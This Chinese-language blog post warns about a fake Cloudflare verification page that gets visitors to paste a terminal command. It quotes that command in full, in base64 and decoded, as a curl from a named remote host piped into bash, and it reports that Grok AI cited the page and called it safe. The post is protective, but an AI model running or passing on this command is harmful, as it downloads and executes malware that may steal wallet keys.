# 假 Cloudflare 驗證安裝惡意軟體 

**Published by:** [louisli.eth](https://paragraph.com/@louisli/)
**Published on:** 2025-10-19
**URL:** https://paragraph.com/@louisli/cloudflare

## Content

以下是一種假的 Cloudflare 認證攻擊方式，如果你想點擊連結了解更多，請小心！！！The History of StablecoinsThis article follows the history of stablecoins from its origination only five years after Satoshi Nakamoto's Bitcoin, 2014, through to today.https://www.deltecbank.com這個假的檢查頁面會要求你在終端機中進行一些複製和貼上。它看起來非常類似我們平常看到的 Cloudflare 頁面。文字顯示是「我不是機器人：Cloudflare 驗證 ID：715921」，但是當你按下複製時，你實際複製的是： echo "Y3VybCAtcyBodHRwczovL2dhbW1hLnNlY3VyZWFwaW1pZGRsZXdhcmUuY29tL3N0cml4L2luZGV4LnBocCB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bash 經過 base64 解碼後，它實際上是： DON’T CLICK!curl -s https://gamma.secureapimiddleware.com/strix/index.php | nohup bash & 意思是你正在指示你的電腦下載一些危險的木馬和惡意軟體，並自己安裝在電腦上。這種將危險指令偽裝成其他東西的方式並不少見。 我試著用 Google 搜尋，發現我不是唯一發現這件事的人，而且看起來這是今年相對較新的駭客技巧。如果我不是有程式設計知識的人，我可能會安裝它，在最壞的情況下，這個工具會掃描我的電腦並取得我一些熱錢包的私鑰。我從哪裡得到這個連結？我實際上是在研究一些穩定幣歷史時，從Grok AI得到這個連結，這個連結來自它的參考資料。當我回覆Grok我的發現時，它堅持這個頁面是安全的！也許是因為該網站最近才被駭，所以 Grok 的下一次爬取還沒有排定。重點提醒記住終端機（控制台）是一個非常強大的工具，可以做任何事情，包括安裝惡意的惡意軟體和木馬。 永遠不要複製和貼上你不了解的指令。 仔細檢查 LLM 給你的每一個連結。不僅是為了避免幻覺，還為了你的安全性。 鏈金術師 Louis Li 假如你有興趣跟我有系統地學習crypto，歡迎在facebook dm我～ 假如你覺得文章寫得不錯，也可以鑄造這個文章成為nft收藏！

## Publication Information

- [louisli.eth](https://paragraph.com/@louisli/): Publication homepage
- [All Posts](https://paragraph.com/@louisli/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@louisli): Subscribe to updates
- [Twitter](https://twitter.com/liszechung): Follow on Twitter